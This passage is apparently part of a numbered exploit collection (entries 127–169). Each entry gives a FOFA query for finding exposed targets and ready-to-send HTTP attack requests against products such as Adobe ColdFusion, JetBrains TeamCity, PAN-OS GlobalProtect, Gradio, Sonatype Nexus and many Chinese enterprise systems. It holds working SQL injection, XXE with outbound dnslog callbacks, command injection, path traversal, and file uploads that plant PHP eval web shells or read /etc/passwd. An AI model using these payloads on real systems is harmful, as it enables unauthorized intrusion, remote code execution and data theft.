Accept-Language: en
Accept-Encoding: gzip


127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--


128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--


131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}


CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--


134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1


138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1


140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}


151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip


153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component id
http://x.x.x.x/config


Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}


Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd


154. Tianweier fire rescue combat dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--


Access the returned file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"


POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 all-in-one smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

